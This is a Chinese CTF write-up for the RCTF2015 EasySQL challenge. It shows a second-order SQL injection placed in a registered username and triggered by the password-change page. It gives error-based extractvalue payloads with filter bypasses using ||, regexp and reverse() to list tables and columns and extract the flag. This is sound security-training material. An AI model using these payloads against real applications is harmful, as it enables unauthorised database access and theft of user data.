本文最后更新于:2023年6月5日 下午
[RCTF2015]EasySQL
打开后发现一个登录注册页面,我们先注册一个:
data:image/s3,"s3://crabby-images/e4cfd/e4cfd06bab31043426dd35a9b3c28d41033e698b" alt="image-20230330203914744"
我们发现有一个改密码的地方:
data:image/s3,"s3://crabby-images/837fe/837fec56a28388c6c3c22e78ebc834ae69a10427" alt="image-20230330203941627"
因为这题提示sql,并且注册时存在一些特殊字符不给注册,我们猜测这应该是二次注入
我们注册一个账号:
data:image/s3,"s3://crabby-images/29ef8/29ef8902bdae69a3cbf3a694af792f8f63923cf7" alt="image-20230330204129383"
当我们修改密码时:
data:image/s3,"s3://crabby-images/05e88/05e884c08713282f71b9d3a35d9c223e9f395358" alt="image-20230330204223055"
发现报错了,于是我们推测,sql语句如下:
1
| select * from table where username="1"" and pwd = '202cb962ac59075b964b07152d234b70'
|
所以我们需要注册时,在用户名处进行sql注入,然后修改密码时报错回显。我们应该使用报错注入
经过测试,空格等被过滤了。我们需要绕过,可以使用()、||
查询表名:
1
| "||extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e))#
|
data:image/s3,"s3://crabby-images/6923a/6923aa8d052a0476552513a3f2c37e48b7c1e8f6" alt="image-20230330210235007"
查询字段名:
1
| "||extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),0x7e))#
|
data:image/s3,"s3://crabby-images/7faa7/7faa77726ca63195f7f6ea33c0fa0f8048b141fa" alt="image-20230330210347837"
查询数据:
1
| "||extractvalue(1,concat(0x7e,(select(group_concat(flag))from(flag)),0x7e))#
|
data:image/s3,"s3://crabby-images/4eb54/4eb54abc0e7a9e6ee8f89a9abdedc73a375cd484" alt="image-20230330210525752"
查询出来了一部分,但是没有显示完全,并且说flag不在这里,
于是我们查询users表
查字段:
1
| "||extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),0x7e))#
|
data:image/s3,"s3://crabby-images/c1947/c1947e1f243f1099db888259fa23e2657c2ee283" alt="image-20230330211039997"
我们想查看完整字段,但是过滤了:left、right、mid函数
我们可以使用正则匹配:(不能使用like,被过滤了)
1
| "||extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')&&((column_name)regexp('^re'))),0x7e))#
|
data:image/s3,"s3://crabby-images/fbcee/fbcee0683c6258e4894b8a35e08d27ed470319db" alt="image-20230330211613972"
查看到字段名:real_flag_1s_here
然后我们去查数据:
1
| "||extractvalue(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)),0x7e))#
|
data:image/s3,"s3://crabby-images/fe484/fe484214da69d87a5e348add0831fa75ee800545" alt="image-20230330212218279"
查到一堆乱七八糟的,我们还是使用正则:
1
| "||extractvalue(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')),0x7e))#
|
data:image/s3,"s3://crabby-images/8f1d3/8f1d3ee1b9b30ed18490a89f16abf354937a511e" alt="image-20230330212335501"
只查到一部分,怎么查另一半呢?这里使用一个函数:reverse()
1
| "||extractvalue(1,concat(0x7e,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),0x7e))#
|
data:image/s3,"s3://crabby-images/130cb/130cbefbc05e49c455224ddd2217a4fa197947d9" alt="image-20230330212800205"
成功查到另一半